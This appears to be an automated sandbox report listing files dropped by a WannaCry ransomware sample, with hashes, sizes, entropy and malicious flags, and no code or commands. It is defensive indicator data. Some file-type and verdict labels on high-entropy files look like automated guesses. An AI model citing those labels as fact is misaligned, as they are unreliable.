                                                  SHA-512:3BCD807FBBF0743B95C006236369597EFD159C9FFD3C4D0A4EFA32E6849C2FD592C409906B82D0F75061C03031C3DA89C27F5B51B3D65AB36E724F3C9F39EBC0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824693748645433
                                                  Encrypted:false
                                                  SSDEEP:24:ufJV5Uio6PDRe4nDNMz3VV/OjgTzE6WOTKXceNPJwK57kFxMqD2n5:0JV0cgA2jn2+2hNPSK57k0nn5
                                                  MD5:5C1258FA6EB4A7CA8DEF84613E949FB6
                                                  SHA1:E9866B0512F65915CEF74D86596392291DD34A72
                                                  SHA-256:B717F20424050A12E4F5D8E5D0183AD2AF4C0885E296C434759E156FAEEAA539
                                                  SHA-512:53B384845D566A9EF1435CE8BD77A7AEC65C4133ED5B419D3CB10617AFAE0F992E84C5931E84EDEB86B2316C23B8438989DF0943A345D3FA7040973B3591ADA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831720836354265
                                                  Encrypted:false
                                                  SSDEEP:24:ZNqn+lAhDjREqYaTNU3p1vrCzDFMbEBlfLCywV:ZNq+lAh+WNwX+zcUfC
                                                  MD5:55AE23E68D6F22E5FACA6ED02E836423
                                                  SHA1:21B82521502F823F51B2FBB2695D5DD61484EA23
                                                  SHA-256:E384563E3B32DD41292BEE955F21D777A45210D1CFCE7D5FE246BD67ECCC36F5
                                                  SHA-512:63AA5186AEC08D657735ECC743EEF9F68CCAB22E355EB2490958C64FBBCD564622366D0614AA1E1E96CDD943628A12239F75568CAD68C917057CB6C9EBE6469D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.796226678192958
                                                  Encrypted:false
                                                  SSDEEP:24:m3CckNTjzTkdc/S31A85mTTxeH8Cfa1dYN9Xqts6k3:m3Cc6HygHrQuE
                                                  MD5:EEB3F078DE2489A8B344014DBF30C577
                                                  SHA1:DE1950E86CD2F10EA52B7D633C58FD7F8EA90DD1
                                                  SHA-256:486B971F8B11006829AECA94D9879322497923968E5BB6FDB521DA241F4DC6A5
                                                  SHA-512:BFDD02F33A2649E57229074152E1C44903D0859E6DC99898FCB325902E2892F82595D67F106C42B22F11CB8EF92E51350574A9D4FBCA978E5A2C402BD0A7DC18
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8068780345827244
                                                  Encrypted:false
                                                  SSDEEP:24:5wI9UP0PdqtSytQ3QLid1u0j8ld5+lh08/t0Ea+X5ucPA/W+6:mCdSSAMUid1u0gld5+bZFBucPYW+6
                                                  MD5:91B16A12E5C2A9061BDDC8BE74720ABE
                                                  SHA1:2FF8B4637DA343CC36CC9E3D8AE65D07B85C423D
                                                  SHA-256:0CD26F9AA88943711EAA14C81EB8C747E6E9881D617DCAFC1CFFE79F1FDBA662
                                                  SHA-512:CF4873FF27B1155A0472D9067DC20F346F111FD7794C3D6A034AE13F1AE25F30243B0EBC8AC80C6C31A5BDFF1A5E5EB0615F083E6039EA6B6307922E42C01433
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802056296456517
                                                  Encrypted:false
                                                  SSDEEP:24:+kUaPHVl7d2dFm8L8uJLJ0C/QmoL1cB3JgfIdLEsJUgAw:7FPTd2Pm8L/F6qQjcrXLHf
                                                  MD5:E0CB323321AD80AA32657B7049955BF9
                                                  SHA1:237E81047F8114B831ACC7742602E48AD6B8EBB3
                                                  SHA-256:84020FF7F711136C61D7E8881F03819E6BDF6DF4C902B3F77003196AE8D6750F
                                                  SHA-512:18272A555A93BA03010974D17B0499D5422A464439BF30767BFB0366A46D3C32E7DC9AB243841D3A0D94F46E78D2A22B2A7D1E9BE84B92B194AB940292BCBEEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7944110964953595
                                                  Encrypted:false
                                                  SSDEEP:24:7JQ+xHUrqJTbn32RNj3TP2ePjLk76hO+ev0zWluaREH6:y+x0rMr32RNj3TP2ek78jeszqC6
                                                  MD5:C7889EBC3C299AAEDC9D3C499DFAE58B
                                                  SHA1:91C7664408DD612E9D9AD9446B83B78672F7AABB
                                                  SHA-256:43C75FA9377EAE391949D6F2BD488F96F29EEB17DC4245484CD2C203A4DEBE6B
                                                  SHA-512:825A8AC88421C69CC127868F45289D1D53CD2DA6886199651E778BE2D8F1ED5CB80EF9F2B2E3AD4953A3A1504BBD4ACB228AC5C91F55F5E7DFC4742EADE98DF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827138986530992
                                                  Encrypted:false
                                                  SSDEEP:24:wtCE+sU3w+zUgHK71/MWELrWYqI18n7Xav+9Pv9SkNRuItwHv:sCE+sU38h/MW3YqI18jamZlSk/tYv
                                                  MD5:C91BF4314249D2EEDEDC77C69825BB54
                                                  SHA1:267E54AC46199A225AFE502ABD091E9110664C7C
                                                  SHA-256:BF72B3A5D071B1E075DF7181693D496A5660E4EFF0E3AF9AC34F60BFE6D79CB5
                                                  SHA-512:6A8A3E57DA22410EDD4C929AFD10ED76880010B5455FD620471C6330C3E577600F2C8303ED97748A446755DB84E522B159B4C0DD8AFF2C212018B4F7741D7DED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823920902058649
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809266884387007
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817309017875281
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809328826148128
                                                  Encrypted:false
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.807389885361978
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808219026271454
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PGP Secret Sub-key -
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831915502669585
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7926358695836955
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814963475003599
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799115671762158
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.774742916772408
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80302777717371
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813001683623214
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.793923022248367
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847470339597998
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824497585972653
                                                  Encrypted:false
                                                  SSDEEP:24:wNW6UhztvV18Z7r20GM2zDStrz3+X95gX2oAhYDv97iTH:SW6UhhE7rhD2keXbgtA+Dv9ej
                                                  MD5:B0507E493A900C25C0C1F53008553840
                                                  SHA1:66BB53B0D1B4CAE13B4358BDD627193EDECA9858
                                                  SHA-256:79A47E41890CCF62983FB1E84DE25C6B5AD42A8942082FD6418B988F42680F3E
                                                  SHA-512:E607B204545D55C8395FE950F452A3538C88FD1E412362FCB5B3BB041CFB953FA30967007D12240159146D694E100158605FA47B0E3E45E52676E0FB2C33F58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.790706969654274
                                                  Encrypted:false
                                                  SSDEEP:24:8IQ+g3MVvnyYSJ4ue6hWal/qvjCiXUaWtm6M:8IhgU9q4shWal/qOiXDWe
                                                  MD5:05D85E25B74BCBB3748225A443C3D55E
                                                  SHA1:D886332244B5648091FB4794B6A64B4369AD0233
                                                  SHA-256:32E776C4FFBF771AE43341EEB33F6B05FFCD4DB6CD020391BDE8FD3CE02C22CB
                                                  SHA-512:59E5D35BB13473D64EB3201FD1A5AEE68CA4D77A2D0DB61B3AFB4A8B053B0109FC81293EFC310021F87B8DC0EAACDA3665900B9635353051D82B07324B7B2100
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791617140072544
                                                  Encrypted:false
                                                  SSDEEP:24:vxJB1vIbc/R325nwrqo/IDVmrgA9CIJbNMAiqvV:Z1vIoZwnwu1V4xEA39
                                                  MD5:25FCAB95331909AAC0507AD8B7EF4A23
                                                  SHA1:CA8FB9291B38254F5F0AA3D601717A90C592C728
                                                  SHA-256:33F1E8CD27F852D452D7A19CECCC670FB91947044C0DFBA85821B892F96BC0E0
                                                  SHA-512:B995E3A26B5D3FE762C7ABA12205406B884A33D1965C1F79E18CD8FDD3C53BE46C30E1A385C40F60C231A2585D1AEAADEE32E3CF56EDCFB03D47B612DE8363C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826449049195866
                                                  Encrypted:false
                                                  SSDEEP:24:gVU1czT74CGq1AsY9soc6VhdN+9v/Ob5osBFhgSsCtY0+rrHLN:wUi+J3sP6VRCv/ONPRY0+rHN
                                                  MD5:5EAE5DD5F9B748505540325FDDEB0E9A
                                                  SHA1:A23C2D51C11705DA4964A8F0EDCD4A1E3A9216BD
                                                  SHA-256:034F87826F2B31CAAFF147717562C70AE2864A5743BBA209B4C77A06F8CDCA74
                                                  SHA-512:80BB34F1D5DA45ED32869FA03C385AFBEADB70D43C89E97684B3F22E9BEEFCDD8257056A1A00C6D03F73DB97D85B5399A6D940D125523F36B17D5A86F9874439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79232013754835
                                                  Encrypted:false
                                                  SSDEEP:24:oZxl81JpnmwfXXJMj7LhP84SSdtI94Drob3wMV94wvowVOdg9VJ5Q:+xomwRMTpnVqwRMVxpJi
                                                  MD5:8E835949F0D8BE5FE6AC747F00599727
                                                  SHA1:0A011CF3D8E0ECBEA4AEED70E1D7BA3A1A5E9929
                                                  SHA-256:57E6E4D594C412378F534977FFF1DCC758A90A97A8F7D7CBED5A44F7615092B8
                                                  SHA-512:27E2DCB2F5A37190364239CB176F5A6B3A8A29949C5E93629E5DADE513A1836070B26434231B5BCEF67D3602C2E4BCEB0D76DECDB0357C8BF0E7113450D3FBA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805824408024066
                                                  Encrypted:false
                                                  SSDEEP:24:PNr9HCIwSSHZt7/hNuvjSw+lqhFkKEclLCZi5+czLoE/8pXH6:fHC3SaZt7/hNuOLlaFkKEclaEvME/R
                                                  MD5:FEF28180F5DEFA1FE68487728B4949BE
                                                  SHA1:9B3F86BB55B017EEA1F784E10CD283D26CBBD7D9
                                                  SHA-256:6FEA34C9131DA3FF13A8ED6B813826AC8D89A5EFE391410FCD52A92A9654F466
                                                  SHA-512:45E2DBB228A894BBF4BBD31B6306DF91B7EA94F4002EFBD00580F323EB8A30FB5CE1C36B95C888D5788765C36AC096A4E4EDB0FAA782BE1A9778FF467E0E0F7D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.794064516864858
                                                  Encrypted:false
                                                  SSDEEP:24:UyuQ6tLe5xlPsBZesAIzom+xGh1m1F20T/PtjW6jERNwUVg:nuQ65Yar+Gh1uFL9jLjX/
                                                  MD5:A7FE7DA33DD6D27FE23582BE8787B170
                                                  SHA1:3D28688AF0F11667CFC93BE036D0530A79C53AEE
                                                  SHA-256:19FCA46084D702B3BD891D2E807BE4CF84EDC03FFD465A7DED7D5C5F65CE4FE4
                                                  SHA-512:B2122BD46EEC9B77665FA58D8FFD7736213E5224D0688D7FF31FBB4C8D61FC60BBFBDEF444086FC04C23C9AC4FAB578A58903599D90A4A855C3DA19F33FE4560
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803341746289428
                                                  Encrypted:false
                                                  SSDEEP:24:yHkLJymbRt/LbFeuaUe5iGaeOT0VdkKVH1Z6:vLlhpeJLZ6
                                                  MD5:808744CED06394BCD0591F65D1DB7F80
                                                  SHA1:C60BD50AD196517BBA21745F1C829AFC201CE1DF
                                                  SHA-256:11B425FA61C9E77F0AA3F6467BB17C7D9563DE2DE7D2C42123D4983C252EF24C
                                                  SHA-512:AA0BF9A7C75583DF2BCE3C6A59DB0B5EF1ABACD1F4B0ACB4A31712D96C1177BE653E730C480FCBE577D06C3DCF58149A3AEDD950CD7A0253B5CCB7C442F9E29C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.78560332413643
                                                  Encrypted:false
                                                  SSDEEP:24:8ea7PVMFJP6LVt6PhAeT/UadfJ18tXwjIYIV8cdnP:8eRP0AhA6p31AXyIBy8P
                                                  MD5:358CA0F1B146F73378A3CCFB206D888F
                                                  SHA1:D3A403B096E28F4C311A221BF94B15A409A90B9D
                                                  SHA-256:92D6A324736291AB667389F4EA5B99A854D01DCA2699630A58DA1DAC6EFA56A5
                                                  SHA-512:802F0BC3009532180684B58C1DC9E896A537F17FE6D06D1692BD84C7F6538F05048DCC392636BF4FD33452025FBC08929CFD9D468459E464BB64F07A8CE3AA39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.812360612444189
                                                  Encrypted:false
                                                  SSDEEP:24:ysAELyPGiAYTulvoJtwMOTHBuCufS/b8l5:ysAYPiAYTovutwM+0CufS/Yl5
                                                  MD5:F39F139E4AE90FEB41D371FEB063A165
                                                  SHA1:03B8A5414E6E35DFEE373CF5B66B4ADF229208B6
                                                  SHA-256:520E715124CEA418595B0B0C061286A84915497322DE5868B975FA3A8528737F
                                                  SHA-512:5A7B5367E74BA92F1F0959ED1BDA531AAD9657028465CE5D2061F5CA07EFC36C5CA81633D0DD3B6ABEDFE459B52385EA7A73A4A895977794ABFE0662FFEE41F1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814816740887121
                                                  Encrypted:false
                                                  SSDEEP:24:OUeXO7RHFsTSXseWrT2OsKssDGfzdnjfPWTZn:OUh7RHFsWe2msQaz5rPWTZn
                                                  MD5:0A246085D7210CC2C2137F8ECABEBB50
                                                  SHA1:5E987FD903088BAB187A9217565B872A34BF60F9
                                                  SHA-256:5EDF801987F8121CED9D0DD690CA053498A6F323A6154324DA8AD3A81B0CDD43
                                                  SHA-512:5659CE74136FAEBD16438658A422947589079D3DF8ABB87491BCB3E8A1A7C277BC98C112B0761616135AC9B0B07DDA9CDB5A10469C5B8B171F080F9A3176516D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823078078306793
                                                  Encrypted:false
                                                  SSDEEP:24:KSBvVVsR+5TDFTKu8OFRvZck5jVBeP9v7/X7iJrI2C6:KStsRQFWupFL5ytbr2rIw
                                                  MD5:13E240ED48EE8EADC3DF0E9C0C7CA782
                                                  SHA1:9EDC2D6DC811CF20AD4D15E8091641B5B8887239
                                                  SHA-256:545B5F1D22F127D3750CC7E029FFD3C7399621CF541D111644794F855FF5A208
                                                  SHA-512:C9A74CB28F81061E3BC79067CA5147C21CE9D88800C0470126C0A3E5F1794A2F65EDBE5ECA0CF1299DF9A8D393961E9BDF1F534A469070C2B9EF5B2CD0EEAB0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813391721287467
                                                  Encrypted:false
                                                  SSDEEP:24:QykbM01mIOBuZhcNuJO2JKaZG9F/T2oVBP3KUrMoMil/PJDUUkSIDlOIpTs:Yf1mIfX8MhKaZ8F7JjXYoFlnJIUbol54
                                                  MD5:4745117616B137D3DA356E97F2756768
                                                  SHA1:1DBC68717E4865DAF037BC78969DACBADCE549D4
                                                  SHA-256:A6FE74920B90F342D706D081BE20A292433DA6BBE35BAE822B18CA80F987C8BE
                                                  SHA-512:AE4CC197DCA9DF9217B23A342C5927BDACA37FF1DD5F670D3375C3615252CC6C8C6B86E69E99DCBC4AE6CF8410D012AD93EA92DC11DA924B21567131FD24D701
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.83373114041739
                                                  Encrypted:false
                                                  SSDEEP:12:DSbb8aBI+1NLvu1GoEL+hUImxvSd/WZ6p3cxlLZe51jew9RxneZdz5J5ZfWsy4YT:DwBDeuLpbUQ6nzqkheF1+sy4BMiHhSv
                                                  MD5:0B30E125E00E569F08D183A0AFBA1AC0
                                                  SHA1:0686DE7755B4158918880BF029D0493EFFD90BE2
                                                  SHA-256:7C730340DA27BCC506CA6A79F81AF8CA42DBB8F30BA66C14F06DA17AA6884D2F
                                                  SHA-512:71F8805A92A11AE654E04C7D5346AC35D3583E74B95C0349CFDA786521C9FC7A846ECEB333BE298AFB532CF29C20AA6517E365EF55356ED0DC7AECFE505F0C6D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80916666933428
                                                  Encrypted:false
                                                  SSDEEP:24:bHLAOC+rEuhVUQTC5+lboUzWSjTn2PBtfiz4rJLwuRQ6xJfyLMEQW:/YiEE+QOYlf32pt6zMlF7fyLL
                                                  MD5:5D0883E414799FDD01AE76AB7E3AA011
                                                  SHA1:ED13947D25F076C6E7C8E7C3204B9EFCB93D7BFF
                                                  SHA-256:5BF3B7F06951E6BD99B1224E6AA8B769F4C12F5E6DB6633513D2DE32546CFB2A
                                                  SHA-512:AAC1FB4F862E4862042E91024C65363B78A977A00D0D3E580F3D37B47F788C83E4A72FF64100574A86CF5ADCFC7E9A4EE17B3D9D64AC91B4FC40BBACE8BA25C7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791364155426318
                                                  Encrypted:false
                                                  SSDEEP:24:kvH1luMGxrwSp2hYTVHuh4S38FDgjmpb0+mJFC5LskgFfrGPtO9:SuMGhhrT9uhr8FDgjib0tLieFClO9
                                                  MD5:C6C9793C9BD4121C420F5224B8C4C994
                                                  SHA1:5BFF65B6E212C788A79DF86F1D2426C44DB05783
                                                  SHA-256:CD32450E810D600F063AB39072861C6A9A08CA42B845E2CB0264BDA6D11EDB8E
                                                  SHA-512:CE5A64F848BB13C99C908DC271E6EFD012387E504E7290BFB57B122F29FCA21C24053E037B82A7F834EBD4DEBB948DA9B80DB5B56F9BCEEBFF976AD44ACDF320
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.782576802731599
                                                  Encrypted:false
                                                  SSDEEP:24:0xbZy+wiSW7xX5ijM6SLaFjifUBp2+TIIAzZemJvpUYT:0dZdwidxJijMtaJisBp2+NAbJRVT
                                                  MD5:1745903D46EAC6D840523E9D16967F5B
                                                  SHA1:DE9F31E627556E04D95DD5938C5293904825A934
                                                  SHA-256:A7FD505AE9D11AF874ECD1436CF5C50C7E7DE787C5F7D90B72039992DFDF5EDB
                                                  SHA-512:1C5DEED0EE5FA3B6F33C5C7C5F685394DDBF322F4B94398F8DE8385C82A549E27D4CA330566373614C3948876B6E74868B5800D209D639EE50F8F3CE833B8BD4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.806038744753786
                                                  Encrypted:false
                                                  SSDEEP:24:U9AV7CVBbVSk5ChrsCPgk0bnAvb4rKxCiRnMOv:GpBBt5ChrsCPgRjY0rNiRR
                                                  MD5:1114513BBBDBFB82E197CDD8F61D085B
                                                  SHA1:DBF1AE27225CC13B2FA0460DEE7FE74B19FA3AE7
                                                  SHA-256:00966092DD665F6C8F9D95CCFA724FE689929CEBD2C4B18E415F33BDC54F0000
                                                  SHA-512:F47539CA1C88AF28DA545D37228F1EBF7D4F9910815D6479E0B6479F4EE6165CC331218C579535DDCBA5E77CB98FA000B8D47AF8EF7D7E5FE4AEC25EA477C8F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.801972753416064
                                                  Encrypted:false
                                                  SSDEEP:24:CkGYSOZfdKYd5M40tmXWd47okFHtr+Mq9sptQkyxV/iNtDOj:CkpfdTdF+nd4zN6MP49xV/iHQ
                                                  MD5:A9DA251708953A180E9E4DDE39145D4A
                                                  SHA1:9E6FE1EFF1451F933870192A8EDAC1C454EF78F7
                                                  SHA-256:B297197BB6754BA8693403EF87D6B5435651C4F777E3DF90914D439A77899AB8
                                                  SHA-512:602C9D316CFCFBBCABD144EDF708EB9E4A40E70A46A5200EA58D4FC8D7B23C00481125841A35EEEE6A0ED98C4B4D62471D36494D6F650EC37587CC7D8EDEC643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803180803604506
                                                  Encrypted:false
                                                  SSDEEP:24:h3XW4p5cI0k/PVFadDlyAcn5XctBAQZkKawlC:hHpp5c98PDIYfkBAQZkKawlC
                                                  MD5:DA322898E885F1E8C925EBAECB6045FA
                                                  SHA1:58BA19237E250CC0C338C7B54376C59A323D8CE9
                                                  SHA-256:9DD7C76EBD45BD9968855D56F4E0368C1EBB6C8554BE56AB9B41BA9DE5BAB3B9
                                                  SHA-512:BCA6C334B42D2D27C699646C0F815BDB70DA0741043C44E475E47130603BBDF167DD879D6933A2172829ACAEE51BAB96F3AD1BEC1B1BD754BE75C174EBF87864
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.781847511154211
                                                  Encrypted:false
                                                  SSDEEP:24:qtAFNSxi+jA+nx4aNTEANuEjIuQ8nkyhwKknT:YAFN8i4WaNpjBnO
                                                  MD5:3D86B521F5076A842802D1003427F0F8
                                                  SHA1:939BC8066C3DB59564B211A6DAA455C4F1725933
                                                  SHA-256:20B6BB7C51A62C21E4F2F8912C50AF9ADC5A52B4DF89C4F04C7B9AC4ED643941
                                                  SHA-512:B7D82C6A2F62DAB099E4D4F578A4E0E95A35C1EE265D72197E8634B13F9677E5BD4D48BEB7D0E308A797C078A284DCE3F86FBE8E376EDB3A83093CACA142CC88
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817605082713292
                                                  Encrypted:false
                                                  SSDEEP:24:xzvtkgYX+wiIJbG6qKt5tQlRVJS6iv5th/WuBLHvDrCh:ltZYX9NJKs5tQlJgv5OYLPDrC
                                                  MD5:F94BD89856E27CBBBF1DDCC317404C20
                                                  SHA1:7A93781DF0A0EEF593F2133A67501D3B8B6E129D
                                                  SHA-256:126E54C6D209DD003123DD62EDF4236C98C9F39D3C459FED68FD32ACE4D1C30F
                                                  SHA-512:C96035E03B44E67B29E3874AD356966C82370814884757BFC0A1A713355F38C381E3307B12EF1BC0160F8E00428CF750B90A9765A63E9EDCE6625339B7DBFE84
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803014480113174
                                                  Encrypted:false
                                                  SSDEEP:24:BK5mPTbhtiACDzIWISa9AqT0M9e42DOvvXBLKCxssQDHMQJGNs1tZPDR:BxbeACV+r0M9aDOvvXg2srrqs1PDR
                                                  MD5:349859A88A857CFEB5FA48B327DA598E
                                                  SHA1:B7245ED8862C33448A8489C0FA7C45F9FCE41554
                                                  SHA-256:C6C6791EF6689A9EB59CD1CD183469AF4F7CDEB6A01C450F0F9968A67D4F0932
                                                  SHA-512:F0C0F09675339DDC2EC6E36EA59F8B101E43211AAF6B1F861A446D4C80B6B8A081034F6B798B6BCA4B89B3D42E247ED4106BA6EB310BAA960D55B776CA0B0893
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
